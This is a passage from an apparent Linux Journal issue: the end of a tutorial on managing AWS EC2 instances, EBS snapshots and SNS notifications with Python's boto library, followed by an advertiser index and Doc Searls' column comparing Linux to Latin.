Assuming a successful launch, run_instances() will return a boto reservation class that represents the reservation created by AWS. This class then can be used to find the instances that are running, assuming it was captured and iterated over right then. A more generic approach is to use the get_all_instances() function to return a list of reservation classes that match the criteria given. In Listing 2, I use the filter parameter to limit my search of instances to those created from the AMI created above and that are actually running.

So, where do you find what filters are available? The boto documentation does not list the filters, but instead points you at the source, which is the AWS developer documentation for each resource (see Resources). Drilling down in that documentation gets you to an API Reference where the options to the various actions are spelled out. For this particular case, the information is in the EC2 API (see Resources) under Actions/DescribeImages. There is not a complete one-to-one correspondence between the boto function names and the AWS API names, but it is close enough to figure out.

Security

Security, as always, is an important issue when discussing a server that is on the Internet. The standard procedures apply to EC2 instances as to regular servers. For those, see Mick Bauer's Paranoid Penguin column in previous issues of LJ, as well as any number of security references.

However, there is a special case related to AMIs that deserves mention. As demonstrated in this article, it is possible to take a publicly available AMI image and make it your own private image. This presents some special problems; see the Security URL in the Resources section. Before you create a production instance, it would be prudent to read that information and take it to heart. For the other side of the coin, consult the Alestic blog (see Resources) for how to create a secure AMI to share with others that does not leak out your private information.


Listing 2. Using boto

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from boto import connect_ec2, connect_sns

# Create private image
con = connect_ec2()
con.create_image("i-c1315eaf", "lj_test")

# Launch/run instance(s)
reserv = con.run_instances("ami-7eb54d17",
    min_count=2, max_count=5, key_name='laptop',
    instance_type="t1.micro",
    placement="us-east-1d",
    disable_api_termination=True)

# Disable termination protection
con.modify_instance_attribute("i-132e457d",
    "disableApiTermination", False)

# Find running instances
res_list = con.get_all_instances(filters={
    "image-id": "ami-7eb54d17",
    "instance-state-name": "running"})

# Find instance information
for reservation in res_list:
    inst_list = reservation.instances
    for instance in inst_list:
        print instance.id, instance.state
# See Figure 1 for output.

# Create a tag
con.create_tags(["i-391c2657"], {"Name": "lj_instance"})
con.create_tags(["vol-a9590ac2"], {"Name": "lj_volume"})

# Get volume
vol = con.get_all_volumes(filters={"tag:Name": "lj_volume"})[0]

# Create snapshot
snap = vol.create_snapshot(vol.tags["Name"] + "Snap")

# Monitor snapshot creation and notify on completion
def check_snapshot(snap):
    while snap.status != "completed":
        print "Sleeping"
        time.sleep(30)
        snap.update()
    g_time = time.gmtime()
    msg_str = "Snapshot " + snap.id + "\n"
    msg_str += "of volume " + snap.volume_id + "\n"
    msg_str += "started at time "
    msg_str += snap.start_time + "\n"
    msg_str += "completed at "
    msg_str += time.asctime(g_time)
    ARN = "arn:aws:sns:us-east-1:213825411462:Lj"
    sns_con = connect_sns()
    sns_con.publish(ARN, msg_str, "Snapshot done")
    print msg_str
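One detail worth pulling out of Listing 2 is the ARN string. As I understand the AWS convention, an ARN is a colon-separated value of the form arn:partition:service:region:account-id:resource, so taking one apart is a small sketch of string handling:

```python
def parse_arn(arn):
    """Pull apart an Amazon Resource Name (ARN) like the one in
    Listing 2. ARNs follow the pattern
    arn:partition:service:region:account-id:resource; splitting on
    at most five colons keeps any colons inside the resource part
    intact."""
    parts = arn.split(":", 5)
    keys = ("prefix", "partition", "service", "region", "account", "resource")
    return dict(zip(keys, parts))

topic = parse_arn("arn:aws:sns:us-east-1:213825411462:Lj")
print(topic["service"], topic["region"], topic["resource"])  # sns us-east-1 Lj
```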


Figure 1. EC2 Instance Information

Having run the function, I now have a list of reservations. Using this list, I iterate through the reservation classes in the list, which yields an instance list that contains instance classes. This, in turn, is iterated over, and various instance attributes are pulled out (Figure 1).

Having created an AMI and launched instances using that image, now what? How about backing up the information contained in the instance? AWS has a feature whereby it is possible to create a snapshot of an EBS volume. What is nice about this is that the snapshots are incremental in nature. Take a snapshot on day one, and it represents the state of the volume at that time. Take a snapshot the next day, and it represents only the differences between the two days. Furthermore, snapshots, even though they represent an EBS volume, are stored as S3 data. The plus to this is that although monthly charges for EBS are based on the size of the volume, space used or not, S3 charges are based on actual space used. So, if you have an EBS volume of 40GB, you are charged 40GB/month. Assuming only half of that is used, the snapshot will accrue charges of roughly 20GB/month. The final feature of a snapshot is that it is possible to create an EBS volume from it that, in turn, can be used to create a new AMI. This makes it relatively easy to return to some point in the past.

To make the snapshot procedure easier, I will create a tag on the instance that has the EBS volume I want to snapshot, as well as the volume itself. AWS supports user-defined tags on many of its resources. The create_tags() function is a generic one that applies a tag to the requested resource(s). The first parameter is a list of resource IDs; the second is a dictionary where the tag name is the key and the tag value is the dictionary value. Knowing the Name tag for the instance, I use get_all_volumes() with a filter to retrieve a volume class. I then use the volume class to create the snapshot, giving the snapshot a Description equal to the volume Name tag plus the string Snap. Though the create_snapshot() will return a snapshot ID fairly quickly, the snapshot may not finish processing for some time. This is where the SNS service comes in handy.

SNS is exactly that, a simple way of sending out notifications. The notifications can go out as e-mail, e-mail in JSON format, HTTP/HTTPS or to the AWS Simple Queue Service (SQS). I don't cover SQS in depth here; just know it is a more robust and featured way of sending messages from AWS.

The first step is to set up a notification topic. The easiest way is to use the SNS tab in the AWS management console. A topic is just an identifier for a particular notification. Once a topic is created, subscriptions can be tied to the topic. The subscriptions do not take effect until they are confirmed. In the case of subscriptions going to e-mail (what I use here), a confirmation e-mail is sent out with a confirmation link. Once the subscription is confirmed, it is available for use.

As I alluded to earlier, I demonstrate monitoring the snapshot creation process with a notification upon completion (Listing 2). The function check_snapshot() takes a snapshot class returned by create_snapshot and checks in on its progress at regular intervals. Note the snap.update(). The AWS API is Web-based and does not maintain a persistent connection. Unless the snapshot returns a status of "completed" immediately, the while loop will run forever without the update() method to refresh the status.

Once the snapshot is completed, a message is constructed using the snap attributes. The message then is published to the SNS topic, which triggers the subscription to be run, and an e-mail should show up shortly. The ARN shown stands for Amazon Resource Name. It is created when the SNS topic is set up and represents the system address for the topic. Note that the simple part of SNS is that there is no delivery confirmation. The AWS API will throw an error if it can't do its part (send the message), but receiving errors are not covered. That's why one of the sending options for SNS is SQS. SQS will hold a message and resend a message for either a certain time period or until it receives confirmation of receipt and a delete request, whichever comes first.

So, there you have it—a basic introduction to using the Python boto library to interact with AWS services and resources. Needless to say, this barely scratches the surface. For more information and to keep current, I recommend the blog at the Alestic site for general AWS information and Mitch Garnaat's blog for boto and AWS information.■

Adrian Klaver (adrian.klaver@gmail.com), having found Python, is on a never-ending quest to explore just how far it can take him.

Resources

boto Web Site: code.google.com/p/boto
What is a boto? www.acsonline.org/factpack/Boto.htm
boto Documentation: boto.cloudhackers.com
boto Blog: www.elastician.com
AWS Web Site: aws.amazon.com
Using Public AMIs: aws.amazon.com/articles/0155828273219400
Creating Secure AMIs: alestic.com/2011/06/ec2-ami-security
EBS vs. S3: docs.amazonwebservices.com/AWSEC2/latest/UserGuide/Concepts_BootFromEBS.html
AWS Free Tier: aws.amazon.com/free
AWS Developer Documentation: aws.amazon.com/documentation
EC2 API: docs.amazonwebservices.com/AWSEC2/latest/APIReference
Alestic: alestic.com

Advertiser Index

CHECK OUT OUR BUYER'S GUIDE ON-LINE. Go to www.linuxjournal.com/buyersguide where you can learn more about our advertisers or link directly to their Web sites. Thank you as always for supporting our advertisers by buying their products!

ADVERTISER / URL / PAGE #
Advanced Clustering Technologies / www.advancedclustering.com / 31
EMAC, Inc. / www.emacinc.com / 11, 33
FSCONS / fscons.org / 53
High Performance Computing / www.flaggmgmt.com/hpc / 61
iXsystems, Inc. / www.ixsystems.com / 7
Logic Supply, Inc. / www.logicsupply.com / 51, 109
Lullabot / doitwithdrupal.com / 2, 71
Microway, Inc. / www.microway.com / 3, 84, 85
OEM Production / www.oemproduction.com / 59
Polywell Computers, Inc. / www.polywell.com / 57
RackMountPro / www.rackmountpro.com / 39
Silicon Mechanics / www.siliconmechanics.com / 21
Technologic Systems / www.embeddedx86.com / 23
USENIX Association / www.usenix.org/lisa11/lj / 35
ZendCon / zendcon.com / 41

ATTENTION ADVERTISERS

The Linux Journal brand's following has grown to a monthly readership nearly one million strong. Encompassing the magazine, Web site, newsletters and much more, Linux Journal offers the ideal content environment to help you reach your marketing objectives. For more information, please visit www.linuxjournal.com/advertising.


EOF

Linux Is Latin

World Domination is still arriving, but it's not thanks to anybody's empire. DOC SEARLS

Rome—Latin isn't the first Western language; it's just the first to become a de facto standard. It's a standard that still exists, or I wouldn't have used "de facto" in the last sentence. Nor would I feel free to leverage Latinate terms in English, which is just one of Latin's many twisted forks.

My first suspicion that Linux was Latin didn't arrive here in Rome, but in a car last week in North Carolina. I was driving up the interstate, somewhere between Graham and Haw River, when I saw a billboard for a company that needed Linux programmers. Thus, it occurred to me, on the spot, that Linux was becoming the lingua franca of big-business IT development.

True, Linux isn't a language in the literal sense, but it is becoming necessary to know Linux if you are going to get along in IT, just as you needed to know Latin if you were going to get along in the Roman Empire and its sphere of influence—for a millennium and a half following the time of Caesar.

Latin was inherited by Rome and its empire from the Latins, a tribe that inhabited Latium, the fertile lands drained by the Tiber along the river's south side. Latin itself was a branch of Italic, which was a branch of Proto-Indo-European, which is now used even less than Multics, which we might call Proto-UNIX. And, thus, we arrive at Latin as a metaphor for Linux.

For Latin, World Domination is still going on, because it is embodied in dozens of languages, as well as countless sciences, art, literature and everything else people teach in school. For Linux, World Domination is still starting.

Like Latin, Linux has roots. Those are mostly in UNIX, which also persists through variants like HP-UX, AIX, Solaris and the BSDs. But Linux is now the One That Matters. It is, by far, the world's most common, easily used and free (as in both beer and speech) OS. And, it didn't require an empire to arrive at that state.

In that sense, it also bears another resemblance to Latin, because what remains of ancient Rome offers less evidence of empire than of engineering. Romans may not have invented everything they spread, but they did create and maintain a system of respect for invention, in the form of writing. They kept records of everything they could. While Rome did much (or all) to give us paved roads, dams, aqueducts, water-distribution systems, public baths, blown glass, cranes, elevators, stadiums and building designs and methods of many kinds, the reason was not just that an empire spread those things. Rome also needed engineers, skilled craftspeople, and a spoken and written language to communicate How Things Are Done.

My favorite example is the Pantheon, which for 1,700 years has held the record for the world's largest un-reinforced concrete dome. Look up at the roof from inside, and you see the shapes of the forms into which mixed concrete was pounded (it wasn't poured). There isn't a crack anywhere in the whole thing.

We know how the Romans made that concrete because they commented on their methods in writing. All their building methods were debugged, patched and improved in ways that are echoed in how we make, improve and communicate about code today. That's one reason the Romans' innovations were easily shared and spread. Having an empire helped, but that was an insufficient condition. They also needed writing and speech that everyone could understand and put to use and re-use.

I'd like to say the same about coffee, which came to the world from Ethiopia by way of Venice. By acclaim, two of the best coffees you can drink are found only at Sant'Eustachio and Tazza d'Oro, both within a stone's throw of the Pantheon. Neither shares their secrets, which are closely guarded and highly proprietary—as once was AT&T's UNIX.

I love the coffee I've enjoyed repeatedly at both places. But I can make espressos, cappuccinos and macchiatos at home too, on my own Italian machine, using coffee roasts of all kinds. And, frankly, I like my own coffee creations just as well, if not better, than these Roman originals, especially when I get them right. Those two places may have set the original standard, but coffee, like language and code, is a living thing that nobody owns, everybody can use and anybody can improve.

I can't guess how long Linux will prove to be the same, but its age is clearly upon us.■

Doc Searls is Senior Editor of Linux Journal. He is also a fellow with the Berkman Center for Internet and Society at Harvard University and the Center for Information Technology and Society at UC Santa Barbara.
